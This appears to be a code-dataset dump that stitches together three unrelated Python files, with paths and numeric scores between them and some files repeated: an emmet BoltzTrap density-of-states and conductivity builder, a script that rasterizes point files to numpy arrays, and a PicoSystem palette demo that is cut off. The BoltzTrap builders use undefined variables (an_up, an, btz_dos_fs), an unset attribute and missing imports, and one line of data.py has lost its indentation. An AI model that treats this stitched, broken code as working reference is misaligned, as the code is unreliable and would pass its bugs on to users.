Calculates Density of States (DOS) using BoltzTrap
Saves the dos object
Args:
materials (Store): Store of materials documents
boltztrap (Store): Store of boltztrap
bandstructure_fs (str): Name of the GridFS where bandstructures are stored
query (dict): dictionary to limit materials to be analyzed
"""
self.materials = materials
self.boltztrap = boltztrap
self.bandstructure_fs = bandstructure_fs
self.btz_cdos_fs = btz_cdos_fs
self.query = query if query else {}
super().__init__(sources=[materials], targets=[boltztrap], **kwargs)
def get_items(self):
"""
Gets all materials that need a new DOS
Returns:
generator of materials to calculate DOS
"""
self.logger.info("BoltzTrap Dos Builder Started")
# All relevant materials that have been updated since boltztrap was last run
# and a uniform bandstructure exists
q = dict(self.query)
q.update(self.materials.lu_filter(self.boltztrap))
q["bandstructure.uniform_oid"] = {"$exists": 1}
#q["output.bandgap"] = {"$gt": 0.0}
mats = set(self.materials.distinct(self.materials.key, criteria=q))
# initialize the gridfs
bfs = gridfs.GridFS(self.materials.database, self.bandstructure_fs)
self.logger.info("Found {} new materials for calculating boltztrap dos".format(len(mats)))
for m in mats:
mat = self.materials.query([self.materials.key, "structure", "input.parameters.NELECT", "bandstructure"],
criteria={self.materials.key: m})
# If a bandstructure oid exists
if "uniform_bs_oid" in mat.get("bandstructure", {}):
bs_json = bfs.get(mat["bandstructure"]["uniform_bs_oid"]).read()
if "zlib" in mat["bandstructure"].get("uniform_bs_compression", ""):
bs_json = zlib.decompress(bs_json)
bs_dict = json.loads(bs_json.decode())
mat["bandstructure"]["uniform_bs"] = bs_dict
yield mat
def process_item(self, item):
"""
Calculates dos running Boltztrap in DOS run mode
Args:
item (dict): a dict with a material_id, bs and a structure
Returns:
cdos: a complete dos object
"""
self.logger.debug("Calculating Boltztrap for {}".format(item[self.materials.key]))
nelect = item["input"]["parameters"]["NELECT"]
bs_dict = item["uniform_bandstructure"]["bs"]
bs_dict['structure'] = item['structure']
bs = BandStructure.from_dict(bs_dict)
with ScratchDir("."):
if bs.is_spin_polarized:
run_path = os.path.join(os.getcwd(), "dos_up")
makedirs_p(run_path)
BoltztrapRunner(bs=bs, nelec=nelect, run_type="DOS", dos_type="TETRA", spin=1).run(path_dir=run_path)
btrap_dir = os.path.join(run_path, "boltztrap")
bta_up = BoltztrapAnalyzer.from_files(btrap_dir)
run_path = os.path.join(os.getcwd(), "dos_dw")
makedirs_p(run_path)
BoltztrapRunner(bs=bs, nelec=nelect, run_type="DOS", dos_type="TETRA", spin=-1).run(path_dir=run_path)
btrap_dir = os.path.join(run_path, "boltztrap")
bta_dw = BoltztrapAnalyzer.from_files(btrap_dir)
cdos = an_up.get_complete_dos(bs.structure, an_dw)
else:
run_path = os.path.join(os.getcwd(), "dos")
makedirs_p(run_path)
BoltztrapRunner(bs=bs, nelec=nelect, run_type="DOS", dos_type="TETRA").run(path_dir=run_path)
btrap_dir = os.path.join(run_path, "boltztrap")
bta = BoltztrapAnalyzer.from_files(btrap_dir)
cdos = an.get_complete_dos(bs.structure)
return {'cdos': cdos.as_dict()}
def update_targets(self, items):
"""
Inserts the new task_types into the task_types collection
Args:
items ([[dict]]): a list of list of thermo dictionaries to update
"""
items = list(filter(None, items))
btz_cdos_fs = gridfs.GridFS(self.materials.database, self.btz_cdos_fs) if self.btz_cdos_fs else None
if len(items) > 0:
self.logger.info("Updating {} boltztrap dos".format(len(items)))
for doc in items:
if self.bta_fs:
btz_dos_doc = dict(doc["cdos"])
btz_dos_json = json.dumps(jsanitize(btz_dos_doc))
btz_dos_gz = zlib.compress(btz_dos_json)
btz_dos_oid = btz_dos_fs.put(btz_dos_gz)
doc['btz_dos_oid'] = btz_dos_oid
doc['btz_dos_compression'] = "zlib"
del doc["cdos"]
self.boltztrap.update(items)
else:
self.logger.info("No items to update")
class BoltztrapBuilder(Builder):
def __init__(self, materials, boltztrap, bandstructure_fs="bandstructure_fs", bta_fs=None, query=None, **kwargs):
"""
Calculates conducitivty parameters using BoltzTrap
Saves the boltztrap analyzer in bta_fs if set otherwise doesn't store it
because it is too large usually to store in Mongo
Args:
materials (Store): Store of materials documents
boltztrap (Store): Store of boltztrap
bandstructure_fs (str): Name of the GridFS where bandstructures are stored
query (dict): dictionary to limit materials to be analyzed
"""
self.materials = materials
self.boltztrap = boltztrap
self.bandstructure_fs = bandstructure_fs
self.bta_fs = bta_fs
self.query = query if query else {}
super().__init__(sources=[materials], targets=[boltztrap], **kwargs)
def get_items(self):
"""
Gets all materials that need a new XRD
Returns:
generator of materials to calculate xrd
"""
self.logger.info("BoltzTrap Builder Started")
# All relevant materials that have been updated since boltztrap was last run
# and a uniform bandstructure exists
q = dict(self.query)
q.update(self.materials.lu_filter(self.boltztrap))
q["bandstructure.uniform_oid"] = {"$exists": 1}
q["output.bandgap"] = {"$gt": 0.0}
mats = set(self.materials.distinct(self.materials.key, criteria=q))
# initialize the gridfs
bfs = gridfs.GridFS(self.materials.database, self.bandstructure_fs)
self.logger.info("Found {} new materials for calculating boltztrap conductivity".format(len(mats)))
for m in mats:
mat = self.materials.query([self.materials.key, "structure", "input.parameters.NELECT", "bandstructure"],
criteria={self.materials.key: m})
# If a bandstructure oid exists
if "uniform_bs_oid" in mat.get("bandstructure", {}):
bs_json = bfs.get(mat["bandstructure"]["uniform_bs_oid"]).read()
if "zlib" in mat["bandstructure"].get("uniform_bs_compression", ""):
bs_json = zlib.decompress(bs_json)
bs_dict = json.loads(bs_json.decode())
mat["bandstructure"]["uniform_bs"] = bs_dict
yield mat
def process_item(self, item):
"""
Calculates diffraction patterns for the structures
Args:
item (dict): a dict with a material_id and a structure
Returns:
dict: a diffraction dict
"""
self.logger.debug("Calculating Boltztrap for {}".format(item[self.materials.key]))
nelect = item["input"]["parameters"]["NELECT"]
bs_dict = item["uniform_bandstructure"]["bs"]
bs_dict['structure'] = item['structure']
bs = BandStructure.from_dict(bs_dict)
with ScratchDir("."):
BoltztrapRunner(bs=bs, nelec=nelect).run(path_dir=os.getcwd())
btrap_dir = os.path.join(os.getcwd(), "boltztrap")
bta = BoltztrapAnalyzer.from_files(btrap_dir)
d = {
"bta": bta.as_dict(),
"boltztrap": {
"thermoelectric": bt_analysis_thermoelectric(bta),
"tcm": bt_analysis_tcm(bta)
}
}
return d
def update_targets(self, items):
"""
Inserts the new task_types into the task_types collection
Args:
items ([[dict]]): a list of list of thermo dictionaries to update
"""
items = list(filter(None, items))
bta_fs = gridfs.GridFS(self.materials.database, self.bta_fs) if self.bta_fs else None
if len(items) > 0:
self.logger.info("Updating {} boltztrap docs".format(len(items)))
for doc in items:
if self.bta_fs:
bta_doc = dict(doc["bta"])
bta_json = json.dumps(jsanitize(bta_doc))
bta_gz = zlib.compress(bta_json)
bta_oid = bta_fs.put(bta_gz)
doc['bta_oid'] = bta_oid
doc['bta_compression'] = "zlib"
del doc["bta"]
self.boltztrap.update(items)
else:
self.logger.info("No items to update")
def bt_analysis_thermoelectric(bta):
"""
Performs analysis for thermoelectrics search
:param bta: Boltztrap analyzer object
:return: dict of Zt,Power Factor, Seebeck, Conducitity and Kappa
"""
d = {}
d["zt"] = bta.get_extreme("zt")
d["pf"] = bta.get_extreme("power factor")
d["seebeck"] = bta.get_extreme("seebeck")
d["conductivity"] = bta.get_extreme("conductivity")
d["kappa_max"] = bta.get_extreme("kappa")
d["kappa_min"] = bta.get_extreme("kappa", maximize=False)
return d
def bt_analysis_tcm(bta, temp_min=300, temp_max=400, doping_min=1e19, doping_max=1e22):
"""
Performs analysis for transparent conductive materials
Focuses on T=300-400K and Doping=1E19-1E22
:param bta: Boltztrap analyzer object
:return: dict of conductivity and effective mass
"""
d = {}
d['avg_eff_mass'] = bta.get_average_eff_mass()
d['doping'] = bta.doping
return d | emmet/materials/boltztrap.py | import logging
from datetime import datetime
from monty.json import jsanitize
from monty.tempfile import ScratchDir
from pymatgen.core.structure import Structure
from pymatgen.electronic_structure.boltztrap import BoltztrapRunner
from maggma.builders import Builder
__author__ = "<NAME> <<EMAIL>>"
class BoltztrapDosBuilder(Builder):
def __init__(self,
materials,
boltztrap,
bandstructure_fs="bandstructure_fs",
btz_cdos_fs=None,
query=None,
**kwargs):
"""
Calculates Density of States (DOS) using BoltzTrap
Saves the dos object
Args:
materials (Store): Store of materials documents
boltztrap (Store): Store of boltztrap
bandstructure_fs (str): Name of the GridFS where bandstructures are stored
query (dict): dictionary to limit materials to be analyzed
"""
self.materials = materials
self.boltztrap = boltztrap
self.bandstructure_fs = bandstructure_fs
self.btz_cdos_fs = btz_cdos_fs
self.query = query if query else {}
super().__init__(sources=[materials], targets=[boltztrap], **kwargs)
def get_items(self):
"""
Gets all materials that need a new DOS
Returns:
generator of materials to calculate DOS
"""
self.logger.info("BoltzTrap Dos Builder Started")
# All relevant materials that have been updated since boltztrap was last run
# and a uniform bandstructure exists
q = dict(self.query)
q.update(self.materials.lu_filter(self.boltztrap))
q["bandstructure.uniform_oid"] = {"$exists": 1}
#q["output.bandgap"] = {"$gt": 0.0}
mats = set(self.materials.distinct(self.materials.key, criteria=q))
# initialize the gridfs
bfs = gridfs.GridFS(self.materials.database, self.bandstructure_fs)
self.logger.info("Found {} new materials for calculating boltztrap dos".format(len(mats)))
for m in mats:
mat = self.materials.query([self.materials.key, "structure", "input.parameters.NELECT", "bandstructure"],
criteria={self.materials.key: m})
# If a bandstructure oid exists
if "uniform_bs_oid" in mat.get("bandstructure", {}):
bs_json = bfs.get(mat["bandstructure"]["uniform_bs_oid"]).read()
if "zlib" in mat["bandstructure"].get("uniform_bs_compression", ""):
bs_json = zlib.decompress(bs_json)
bs_dict = json.loads(bs_json.decode())
mat["bandstructure"]["uniform_bs"] = bs_dict
yield mat
def process_item(self, item):
"""
Calculates dos running Boltztrap in DOS run mode
Args:
item (dict): a dict with a material_id, bs and a structure
Returns:
cdos: a complete dos object
"""
self.logger.debug("Calculating Boltztrap for {}".format(item[self.materials.key]))
nelect = item["input"]["parameters"]["NELECT"]
bs_dict = item["uniform_bandstructure"]["bs"]
bs_dict['structure'] = item['structure']
bs = BandStructure.from_dict(bs_dict)
with ScratchDir("."):
if bs.is_spin_polarized:
run_path = os.path.join(os.getcwd(), "dos_up")
makedirs_p(run_path)
BoltztrapRunner(bs=bs, nelec=nelect, run_type="DOS", dos_type="TETRA", spin=1).run(path_dir=run_path)
btrap_dir = os.path.join(run_path, "boltztrap")
bta_up = BoltztrapAnalyzer.from_files(btrap_dir)
run_path = os.path.join(os.getcwd(), "dos_dw")
makedirs_p(run_path)
BoltztrapRunner(bs=bs, nelec=nelect, run_type="DOS", dos_type="TETRA", spin=-1).run(path_dir=run_path)
btrap_dir = os.path.join(run_path, "boltztrap")
bta_dw = BoltztrapAnalyzer.from_files(btrap_dir)
cdos = an_up.get_complete_dos(bs.structure, an_dw)
else:
run_path = os.path.join(os.getcwd(), "dos")
makedirs_p(run_path)
BoltztrapRunner(bs=bs, nelec=nelect, run_type="DOS", dos_type="TETRA").run(path_dir=run_path)
btrap_dir = os.path.join(run_path, "boltztrap")
bta = BoltztrapAnalyzer.from_files(btrap_dir)
cdos = an.get_complete_dos(bs.structure)
return {'cdos': cdos.as_dict()}
def update_targets(self, items):
"""
Inserts the new task_types into the task_types collection
Args:
items ([[dict]]): a list of list of thermo dictionaries to update
"""
items = list(filter(None, items))
btz_cdos_fs = gridfs.GridFS(self.materials.database, self.btz_cdos_fs) if self.btz_cdos_fs else None
if len(items) > 0:
self.logger.info("Updating {} boltztrap dos".format(len(items)))
for doc in items:
if self.bta_fs:
btz_dos_doc = dict(doc["cdos"])
btz_dos_json = json.dumps(jsanitize(btz_dos_doc))
btz_dos_gz = zlib.compress(btz_dos_json)
btz_dos_oid = btz_dos_fs.put(btz_dos_gz)
doc['btz_dos_oid'] = btz_dos_oid
doc['btz_dos_compression'] = "zlib"
del doc["cdos"]
self.boltztrap.update(items)
else:
self.logger.info("No items to update")
class BoltztrapBuilder(Builder):
def __init__(self, materials, boltztrap, bandstructure_fs="bandstructure_fs", bta_fs=None, query=None, **kwargs):
"""
Calculates conducitivty parameters using BoltzTrap
Saves the boltztrap analyzer in bta_fs if set otherwise doesn't store it
because it is too large usually to store in Mongo
Args:
materials (Store): Store of materials documents
boltztrap (Store): Store of boltztrap
bandstructure_fs (str): Name of the GridFS where bandstructures are stored
query (dict): dictionary to limit materials to be analyzed
"""
self.materials = materials
self.boltztrap = boltztrap
self.bandstructure_fs = bandstructure_fs
self.bta_fs = bta_fs
self.query = query if query else {}
super().__init__(sources=[materials], targets=[boltztrap], **kwargs)
def get_items(self):
"""
Gets all materials that need a new XRD
Returns:
generator of materials to calculate xrd
"""
self.logger.info("BoltzTrap Builder Started")
# All relevant materials that have been updated since boltztrap was last run
# and a uniform bandstructure exists
q = dict(self.query)
q.update(self.materials.lu_filter(self.boltztrap))
q["bandstructure.uniform_oid"] = {"$exists": 1}
q["output.bandgap"] = {"$gt": 0.0}
mats = set(self.materials.distinct(self.materials.key, criteria=q))
# initialize the gridfs
bfs = gridfs.GridFS(self.materials.database, self.bandstructure_fs)
self.logger.info("Found {} new materials for calculating boltztrap conductivity".format(len(mats)))
for m in mats:
mat = self.materials.query([self.materials.key, "structure", "input.parameters.NELECT", "bandstructure"],
criteria={self.materials.key: m})
# If a bandstructure oid exists
if "uniform_bs_oid" in mat.get("bandstructure", {}):
bs_json = bfs.get(mat["bandstructure"]["uniform_bs_oid"]).read()
if "zlib" in mat["bandstructure"].get("uniform_bs_compression", ""):
bs_json = zlib.decompress(bs_json)
bs_dict = json.loads(bs_json.decode())
mat["bandstructure"]["uniform_bs"] = bs_dict
yield mat
def process_item(self, item):
"""
Calculates diffraction patterns for the structures
Args:
item (dict): a dict with a material_id and a structure
Returns:
dict: a diffraction dict
"""
self.logger.debug("Calculating Boltztrap for {}".format(item[self.materials.key]))
nelect = item["input"]["parameters"]["NELECT"]
bs_dict = item["uniform_bandstructure"]["bs"]
bs_dict['structure'] = item['structure']
bs = BandStructure.from_dict(bs_dict)
with ScratchDir("."):
BoltztrapRunner(bs=bs, nelec=nelect).run(path_dir=os.getcwd())
btrap_dir = os.path.join(os.getcwd(), "boltztrap")
bta = BoltztrapAnalyzer.from_files(btrap_dir)
d = {
"bta": bta.as_dict(),
"boltztrap": {
"thermoelectric": bt_analysis_thermoelectric(bta),
"tcm": bt_analysis_tcm(bta)
}
}
return d
def update_targets(self, items):
"""
Inserts the new task_types into the task_types collection
Args:
items ([[dict]]): a list of list of thermo dictionaries to update
"""
items = list(filter(None, items))
bta_fs = gridfs.GridFS(self.materials.database, self.bta_fs) if self.bta_fs else None
if len(items) > 0:
self.logger.info("Updating {} boltztrap docs".format(len(items)))
for doc in items:
if self.bta_fs:
bta_doc = dict(doc["bta"])
bta_json = json.dumps(jsanitize(bta_doc))
bta_gz = zlib.compress(bta_json)
bta_oid = bta_fs.put(bta_gz)
doc['bta_oid'] = bta_oid
doc['bta_compression'] = "zlib"
del doc["bta"]
self.boltztrap.update(items)
else:
self.logger.info("No items to update")
def bt_analysis_thermoelectric(bta):
"""
Performs analysis for thermoelectrics search
:param bta: Boltztrap analyzer object
:return: dict of Zt,Power Factor, Seebeck, Conducitity and Kappa
"""
d = {}
d["zt"] = bta.get_extreme("zt")
d["pf"] = bta.get_extreme("power factor")
d["seebeck"] = bta.get_extreme("seebeck")
d["conductivity"] = bta.get_extreme("conductivity")
d["kappa_max"] = bta.get_extreme("kappa")
d["kappa_min"] = bta.get_extreme("kappa", maximize=False)
return d
def bt_analysis_tcm(bta, temp_min=300, temp_max=400, doping_min=1e19, doping_max=1e22):
"""
Performs analysis for transparent conductive materials
Focuses on T=300-400K and Doping=1E19-1E22
:param bta: Boltztrap analyzer object
:return: dict of conductivity and effective mass
"""
d = {}
d['avg_eff_mass'] = bta.get_average_eff_mass()
d['doping'] = bta.doping
return d | 0.713931 | 0.273866 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import argparse
import os
from skimage.io import imsave
from utils import read_points
from utils import list_files, read_gray
#53941
#12270
#dataset/point/full/coords_rat-09-full.pts
#dataset/point/skel/coords_pocket-2-skel.pts
PT_PATH = "dataset/pixel/test"
PX_PATH = "dataset/pixel/train"
SK_PATH = "dataset/pixel/skel"
def get_in_pix(filename="in_pix.npy", ispix=True, isskel=False, istest=False):
    """Load a dataset split as a stacked uint8 array and save it as .npy.

    When ispix is True, images are read directly with read_gray; otherwise
    .pts point files are rasterized onto blank 256x256 images (each point
    set to 255) and a debug PNG of every rasterization is written to tmp/.

    :param filename: output .npy path (only written when istest is False)
    :param ispix: read pre-rendered images instead of point files
    :param isskel: read from the skeleton directory
    :param istest: read the test split; skips channel expansion and saving
    :return: np.ndarray of stacked images
    """
    # Select the source directory from the flags; point data mirrors the
    # pixel layout under dataset/point/.
    path = PX_PATH
    if istest:
        path = PT_PATH
    if isskel:
        path = SK_PATH
    if not ispix:
        path = path.replace("pixel", "point")
    files = list_files(path)
    pix = []
    # Track observed coordinate range and largest point count for logging.
    pmax = 0
    pmin = 255
    maxpts = 0
    for f in files:
        pix_file = os.path.join(path, f)
        print(pix_file)
        if ispix:
            pix_data = read_gray(pix_file)
        else:
            image = np.zeros((256,256), dtype=np.uint8)
            pix_data = read_points(pix_file)
            if len(pix_data) > maxpts:
                maxpts = len(pix_data)
            for p in pix_data:
                if p[0]>pmax:
                    pmax = p[0]
                if p[0]<pmin:
                    pmin = p[0]
                if p[1]>pmax:
                    pmax = p[1]
                if p[1]<pmin:
                    pmin = p[1]
                # NOTE(review): coordinates are clamped at 255 but not at 0;
                # negative values would wrap via numpy indexing — confirm
                # input range of read_points.
                x = min(round(p[0]), 255)
                y = min(round(p[1]), 255)
                image[x][y] = 255
            impath = os.path.join("tmp", f + ".png")
            print("Saving ... ", impath)
            # NOTE(review): skimage.io.imsave forwards cmap to the plugin;
            # recent scikit-image versions reject this kwarg — confirm the
            # installed version.
            imsave(impath, image, cmap='gray')
            pix_data = image
        pix.append(pix_data)
    # Max pts: 12270
    print("Max pts: ", maxpts)
    pix = np.array(pix)
    print("Shape: ", pix.shape)
    print("PMin: ", pmin)
    print("PMax: ", pmax)
    if not istest:
        # add a trailing channel axis: (N, H, W) -> (N, H, W, 1)
        pix = np.expand_dims(pix, axis=3)
    print("Final shape: ", pix.shape)
    print("Min: ", np.amin(pix))
    print("Max: ", np.amax(pix))
    if not istest:
        print("Saving to ", filename)
        np.save(filename, pix)
    return pix
def get_out_pix(filename="out_pix.npy"):
    """Load skeleton images, collapse colour channels, and save as .npy.

    :param filename: output .npy path
    :return: np.ndarray of shape (N, H, W, 1), dtype uint8
    """
    files = list_files(SK_PATH)
    pix = []
    for f in files:
        pix_file = os.path.join(SK_PATH, f)
        pix_data = read_gray(pix_file)
        print(pix_file)
        pix.append(pix_data)
    pix = np.array(pix)
    # NOTE(review): mean over axis=3 requires the stacked array to be 4-D,
    # i.e. read_gray must return HxWxC images here — confirm.
    pix = np.mean(pix, axis=3)
    pix = pix.astype(np.uint8)
    print("Shape: ", pix.shape)
    print("Uniques: ", np.unique(pix))
    # add a trailing channel axis: (N, H, W) -> (N, H, W, 1)
    pix = np.expand_dims(pix, axis=3)
    print("Final shape: ", pix.shape)
    print("Min: ", np.amin(pix))
    print("Max: ", np.amax(pix))
    print("Saving to ", filename)
    np.save(filename, pix)
    return pix
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    help_ = "Generate train input dataset npy file"
    parser.add_argument("--input",
                        default=False,
                        action='store_true',
                        help=help_)
    help_ = "Generate train output dataset npy file"
    parser.add_argument("--output",
                        default=False,
                        action='store_true',
                        help=help_)
    args = parser.parse_args()
    # Output directories for generated .npy datasets and debug images.
    if not os.path.isdir('npy'):
        os.makedirs('npy')
    if not os.path.isdir('tmp'):
        os.makedirs('tmp')
    if args.output:
        filename = os.path.join("npy", "out_pts.npy")
        # NOTE(review): targets are built from skeleton *point* files via
        # get_in_pix(isskel=True); get_out_pix is never called — confirm
        # this is intended.
        get_in_pix(filename=filename, ispix=False, isskel=True, istest=False)
    if args.input:
        filename = os.path.join("npy", "in_pts.npy")
get_in_pix(filename=filename, ispix=False, isskel=False, istest=False) | data.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import argparse
import os
from skimage.io import imsave
from utils import read_points
from utils import list_files, read_gray
#53941
#12270
#dataset/point/full/coords_rat-09-full.pts
#dataset/point/skel/coords_pocket-2-skel.pts
# Dataset layout: rasterized test/train images and skeleton images; the
# matching point-file tree replaces "pixel" with "point" in these paths.
PT_PATH = "dataset/pixel/test"
PX_PATH = "dataset/pixel/train"
SK_PATH = "dataset/pixel/skel"
def get_in_pix(filename="in_pix.npy", ispix=True, isskel=False, istest=False):
    """Load a dataset split as a stacked uint8 array and save it as .npy.

    When ispix is True, images are read directly with read_gray; otherwise
    .pts point files are rasterized onto blank 256x256 images (each point
    set to 255) and a debug PNG of every rasterization is written to tmp/.

    :param filename: output .npy path (only written when istest is False)
    :param ispix: read pre-rendered images instead of point files
    :param isskel: read from the skeleton directory
    :param istest: read the test split; skips channel expansion and saving
    :return: np.ndarray of stacked images
    """
    # Select the source directory from the flags; point data mirrors the
    # pixel layout under dataset/point/.
    path = PX_PATH
    if istest:
        path = PT_PATH
    if isskel:
        path = SK_PATH
    if not ispix:
        path = path.replace("pixel", "point")
    files = list_files(path)
    pix = []
    # Track observed coordinate range and largest point count for logging.
    pmax = 0
    pmin = 255
    maxpts = 0
    for f in files:
        pix_file = os.path.join(path, f)
        print(pix_file)
        if ispix:
            pix_data = read_gray(pix_file)
        else:
            image = np.zeros((256,256), dtype=np.uint8)
            pix_data = read_points(pix_file)
            if len(pix_data) > maxpts:
                maxpts = len(pix_data)
            for p in pix_data:
                if p[0]>pmax:
                    pmax = p[0]
                if p[0]<pmin:
                    pmin = p[0]
                if p[1]>pmax:
                    pmax = p[1]
                if p[1]<pmin:
                    pmin = p[1]
                # NOTE(review): coordinates are clamped at 255 but not at 0;
                # negative values would wrap via numpy indexing — confirm
                # input range of read_points.
                x = min(round(p[0]), 255)
                y = min(round(p[1]), 255)
                image[x][y] = 255
            impath = os.path.join("tmp", f + ".png")
            print("Saving ... ", impath)
            # NOTE(review): skimage.io.imsave forwards cmap to the plugin;
            # recent scikit-image versions reject this kwarg — confirm the
            # installed version.
            imsave(impath, image, cmap='gray')
            pix_data = image
        pix.append(pix_data)
    # Max pts: 12270
    print("Max pts: ", maxpts)
    pix = np.array(pix)
    print("Shape: ", pix.shape)
    print("PMin: ", pmin)
    print("PMax: ", pmax)
    if not istest:
        # add a trailing channel axis: (N, H, W) -> (N, H, W, 1)
        pix = np.expand_dims(pix, axis=3)
    print("Final shape: ", pix.shape)
    print("Min: ", np.amin(pix))
    print("Max: ", np.amax(pix))
    if not istest:
        print("Saving to ", filename)
        np.save(filename, pix)
    return pix
def get_out_pix(filename="out_pix.npy"):
    """Load skeleton images, collapse colour channels, and save as .npy.

    :param filename: output .npy path
    :return: np.ndarray of shape (N, H, W, 1), dtype uint8
    """
    files = list_files(SK_PATH)
    pix = []
    for f in files:
        pix_file = os.path.join(SK_PATH, f)
        pix_data = read_gray(pix_file)
        print(pix_file)
        pix.append(pix_data)
    pix = np.array(pix)
    # NOTE(review): mean over axis=3 requires the stacked array to be 4-D,
    # i.e. read_gray must return HxWxC images here — confirm.
    pix = np.mean(pix, axis=3)
    pix = pix.astype(np.uint8)
    print("Shape: ", pix.shape)
    print("Uniques: ", np.unique(pix))
    # add a trailing channel axis: (N, H, W) -> (N, H, W, 1)
    pix = np.expand_dims(pix, axis=3)
    print("Final shape: ", pix.shape)
    print("Min: ", np.amin(pix))
    print("Max: ", np.amax(pix))
    print("Saving to ", filename)
    np.save(filename, pix)
    return pix
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    help_ = "Generate train input dataset npy file"
    parser.add_argument("--input",
                        default=False,
                        action='store_true',
                        help=help_)
    help_ = "Generate train output dataset npy file"
    parser.add_argument("--output",
                        default=False,
                        action='store_true',
                        help=help_)
    args = parser.parse_args()
    # Output directories for generated .npy datasets and debug images.
    if not os.path.isdir('npy'):
        os.makedirs('npy')
    if not os.path.isdir('tmp'):
        os.makedirs('tmp')
    if args.output:
        filename = os.path.join("npy", "out_pts.npy")
        # NOTE(review): targets are built from skeleton *point* files via
        # get_in_pix(isskel=True); get_out_pix is never called — confirm
        # this is intended.
        get_in_pix(filename=filename, ispix=False, isskel=True, istest=False)
    if args.input:
        filename = os.path.join("npy", "in_pts.npy")
get_in_pix(filename=filename, ispix=False, isskel=False, istest=False) | 0.39257 | 0.154535 |
import math
import time
# Audio voice used for movement blips (PicoSystem Voice API).
blip = Voice(10, 0, 80, 0, 0, 0, 0, 100)
# Offscreen buffer holding the pre-rendered 64x64 palette plus 2px border.
picker = Buffer(68, 68)
# Per-channel sliders: [label, current value (0..15), outline colour].
sliders = [
    ["R", 15, rgb(15, 0, 0)],
    ["G", 6, rgb(0, 15, 0)],
    ["B", 9, rgb(0, 0, 15)]
]
# selected colour coordinates
sx = 32
sy = 32
def colour_from_xy(x, y):
    """Map a palette-grid coordinate (0..63, 0..63) to an (r, g, b) triplet."""
    # The 64x64 grid packs all 4096 colours: red selects the 16x16 tile
    # (4 tiles per row), green varies down a tile, blue across it.
    tile_col, blue = divmod(x, 16)
    tile_row, green = divmod(y, 16)
    red = tile_row * 4 + tile_col
    return int(red), int(green), int(blue)
def update(tick):
    """Poll the d-pad every 5 ticks, move/clamp the cursor, refresh sliders."""
    global sx, sy
    if tick % 5 == 0:
        # every 5th tick (every 50ms) check for user input and move/clamp the
        # cursor position accordingly
        if button(UP):
            sy -= 1
            sy = max(0, sy)
            blip.play(1800, 10, 100)
        if button(DOWN):
            sy += 1
            sy = min(63, sy)
            blip.play(1800, 10, 100)
        if button(LEFT):
            sx -= 1
            sx = max(0, sx)
            blip.play(1800, 10, 100)
        if button(RIGHT):
            sx += 1
            sx = min(63, sx)
            blip.play(1800, 10, 100)
    # update our selected colour from the new cursor position
    sliders[0][1], sliders[1][1], sliders[2][1] = colour_from_xy(sx, sy)
def draw_rgb_palette(x, y):
    """Blit the pre-rendered palette buffer at (x, y) and overlay the cursor."""
    blit(picker, 0, 0, 68, 68, x, y)
    # calculate a brightness for the cursor that pulses over time
    cursor_pulse = int((math.sin(time.ticks_ms() / 100.0) + 1.0) * 7.5)
    pen(cursor_pulse, cursor_pulse, cursor_pulse)
    # draw cursor: four 3px crosshair arms around the selected cell
    # (the +2 offsets skip the palette border)
    hline(sx - 5 + x + 2, sy + y + 2, 3)
    hline(sx + 2 + x + 2, sy + y + 2, 3)
    vline(sx + x + 2, sy - 5 + y + 2, 3)
    vline(sx + x + 2, sy + 2 + y + 2, 3)
def prepare_rgb_palette():
    """Render the full 64x64 palette (plus border) into the offscreen buffer."""
    target(picker)
    blend(COPY)
    # clear to black
    pen(0, 0, 0)
    clear()
    # draw outline
    pen(8, 8, 8)
    rect(0, 0, 68, 68)
    # draw the full palette grid of 64 x 64 pixels, this covers every single
    # colour in the picosystem 4096 colour (4 bits per channel) palette.
    for py in range(64):
        for px in range(64):
            r, g, b = colour_from_xy(px, py)
            pen(r, g, b)
            pixel(px + 2, py + 2)
    # restore drawing to the screen with normal alpha blending
    target()
    blend(ALPHA)
def draw_slider(slider, x, y):
    """Draw one channel slider: outline box plus a fill proportional to value."""
    width, height = 10, 68
    # outline in the channel's colour
    pen(slider[2])
    rect(x, y, width, height)
    # fill grows upward from the bottom, inset 2px inside the outline,
    # scaled to the 0..15 channel value
    fill_h = int(((height - 4) * slider[1]) / 15)
    frect(x + 2, y + height - fill_h - 2, width - 4, fill_h)
def draw(tick):
    """Render one frame: title bar, palette, sliders, swatch and readout."""
    # clear the screen
    pen(1, 1, 1)
    clear()
    # draw title
    pen(15, 15, 15)
    frect(0, 0, 120, 11)
    pen(1, 1, 1)
    text("Palette Explorer", 2, 2)
    # draw full palette
    draw_rgb_palette(5, 18)
    # draw r, g, b value sliders
    draw_slider(sliders[0], 80, 18)
    draw_slider(sliders[1], 92, 18)
    draw_slider(sliders[2], 104, 18)
    # draw selected colour swatch
    pen(8, 8, 8)
    rect(80, 92, 34, 23)
    col = rgb(sliders[0][1], sliders[1][1], sliders[2][1])
    pen(col)
    frect(82, 94, 30, 19)
    # draw pen() call and constant value
    pen(13, 13, 13)
    pen_call = f"pen({sliders[0][1]}, {sliders[1][1]}, {sliders[2][1]})"
    text(pen_call, 5, 92)
    text(f"col = 0x{col:04x}", 5, 107)
# render the palette buffer once at startup
prepare_rgb_palette()
start() | micropython/examples/picosystem/colour.py | import math
import time
# Audio voice used for movement blips (PicoSystem Voice API).
blip = Voice(10, 0, 80, 0, 0, 0, 0, 100)
# Offscreen buffer holding the pre-rendered 64x64 palette plus 2px border.
picker = Buffer(68, 68)
# Per-channel sliders: [label, current value (0..15), outline colour].
sliders = [
    ["R", 15, rgb(15, 0, 0)],
    ["G", 6, rgb(0, 15, 0)],
    ["B", 9, rgb(0, 0, 15)]
]
# selected colour coordinates
sx = 32
sy = 32
def colour_from_xy(x, y):
    """Map a palette-grid coordinate (0..63, 0..63) to an (r, g, b) triplet."""
    # The 64x64 grid packs all 4096 colours: red selects the 16x16 tile
    # (4 tiles per row), green varies down a tile, blue across it.
    tile_col, blue = divmod(x, 16)
    tile_row, green = divmod(y, 16)
    red = tile_row * 4 + tile_col
    return int(red), int(green), int(blue)
def update(tick):
    """Poll the d-pad every 5 ticks, move/clamp the cursor, refresh sliders."""
    global sx, sy
    if tick % 5 == 0:
        # every 5th tick (every 50ms) check for user input and move/clamp the
        # cursor position accordingly
        if button(UP):
            sy -= 1
            sy = max(0, sy)
            blip.play(1800, 10, 100)
        if button(DOWN):
            sy += 1
            sy = min(63, sy)
            blip.play(1800, 10, 100)
        if button(LEFT):
